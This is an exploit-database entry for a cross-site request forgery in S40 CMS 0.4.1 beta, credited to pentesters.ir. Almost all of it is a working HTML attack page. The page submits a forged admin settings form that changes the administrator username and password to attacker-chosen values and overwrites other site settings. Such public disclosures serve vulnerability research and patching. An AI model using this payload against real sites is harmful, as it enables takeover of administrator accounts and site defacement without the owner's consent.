S40 CMS 0.4.1 - Cross-Site Request Forgery (Change Admin Password)

EDB-ID:

15902

CVE:

N/A




Platform:

PHP

Date:

2011-01-04


In The Name Of GOD 
[+] Exploit Title:remote change user and password exploit
[+] Date: 2010
[+] script:S40 CMS v.0.4.1 beta 
[+] Software: http://s40.biz/?p=download
[+] Author  : pentesters.ir
[+]discovered by:ahmadbady
[+] Contact : kivi_hacker666@yahoo.com
[+] Website : WwW.PenTesters.IR 
expl:
 <h1>coded by ahmadbady</h1>
<div id="inner">
<h1>http://pentesters.ir</h1>
<form id="settings" name="settings" method="post" action="/S40CMS_041_beta/admin/main.php?a=settings" class="form">
  <table width="100%" border="0" cellspacing="2" cellpadding="0">
    <tr>
      <td colspan="2"><h2>Site settings</h2></td>
    </tr>
    <tr>
      <td width="70%" align="left" valign="top">The name of your site</td>
      <td width="30%" align="left" valign="top"></td>
    </tr>
    <tr>
      <td width="70%" align="left" valign="top">
      <input name="title" type="text" class="validate[required] field" id="title" style="width:99%" value="root" /></td>
      <td width="30%" align="left" valign="top"></td>
    </tr>
    <tr>
      <td align="left" valign="top">Root URL address of your site (with end slash)</td>
      <td align="left" valign="top"> </td>
    </tr>
    <tr>
      <td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td>
      <td align="left" valign="top"> </td>
    </tr>
    <tr>
      <td colspan="2" align="left" valign="top">Your slogan</td>
    </tr>
    <tr>
      <td colspan="2" align="left" valign="top"><input name="slogan" type="text" class="validate[required] field" id="slogan" style="width:99%" value="roooot" /></td>
    </tr>
    <tr>
      <td colspan="2" align="left" valign="top">Keywords</td>
    </tr>
    <tr>
      <td colspan="2" align="left" valign="top"><input name="keywords" type="text" class="validate[required] field" id="keywords" style="width:99%" value="S40 CMS, content, management, system, cms" /></td>
    </tr>
    <tr>
      <td width="70%" align="left" valign="top">Description</td>
      <td width="30%" align="left" valign="top">Site theme</td>
    </tr>
    <tr>
      <td width="70%" rowspan="4" align="left" valign="top"><textarea name="description" id="description" rows="5" style="width:99%;" class="field">S40 CMS Free flat file Content Management System&lt;/textarea&gt;</td>
      <td width="30%" align="left" valign="top">
        <select name="theme" id="theme">
        <option value="default" selected="selected">default</option>      </select></td>
    </tr>
    <tr>
      <td width="30%" align="left" valign="top">Site language</td>
    </tr>
    <tr>
      <td width="30%" align="left" valign="top"><select name="lang" id="lang">
      <option value="en" selected="selected">en</option>      </select></td>
    </tr>
    <tr>
      <td width="30%" align="left" valign="top">Language direction</td>
    </tr>
    <tr>
      <td width="70%" align="left" valign="top"><h2>User settings</h2></td>
      <td align="left" valign="top"><select name="langdir" id="langdir">
       <option value="ltr" selected="selected">ltr</option><option value="rtl">rtl</option>      </select></td>
    </tr>
    <tr>
      <td align="left" valign="top">Your name</td>
      <td align="left" valign="top">Sidecol position</td>
    </tr>
    <tr>
      <td align="left" valign="top"><input name="name" type="text" class="validate[required] field" id="name" style="width:99%" value="ahmadbady" /></td>
      <td align="left" valign="top"><select name="sidecol" id="sidecol">
      <option value="right" selected="selected">Right</option><option value="left">Left</option>      </select></td>
    </tr>
    <tr>
      <td align="left" valign="top">Username-----At least 6 characters</td></td>
      <td align="left" valign="top">Display headerbar</td>
    </tr>
    <tr>
      <td align="left" valign="top"><input name="user" type="text" class="validate[required,length[6,24]] field" id="user" style="width:99%" value="ahmadbady" /></td>
      <td align="left" valign="top"><select name="headerbar" id="headerbar">
      <option value="true" selected="selected">Display</option><option value="false">Hide</option>      </select></td>
    </tr>
    <tr>
      <td align="left" valign="top">Password-----just 6 characters</td></td>
      <td align="left" valign="top"> </td>
    </tr>
    <tr>
      <td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td>
      <td align="left" valign="top"> </td>
    </tr>
    <tr>
      <td align="left" valign="top">Password again-----just 6 characters</td></td>
      <td align="left" valign="top"> </td>
    </tr>
    <tr>
      <td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td>
      <td align="left" valign="top"> </td>
    </tr>
    <tr>
      <td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" />
      <input name="submit" type="hidden" id="submit" value="true" />
      <input name="actions" type="hidden" id="actions" value="settings" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center" valign="top"> </td>
    </tr>
  </table>
</form>
</div>
</div>
<div id="end" class="roundbtm"></div>
</div>
<div id="footer">
</div>
</body>
</html>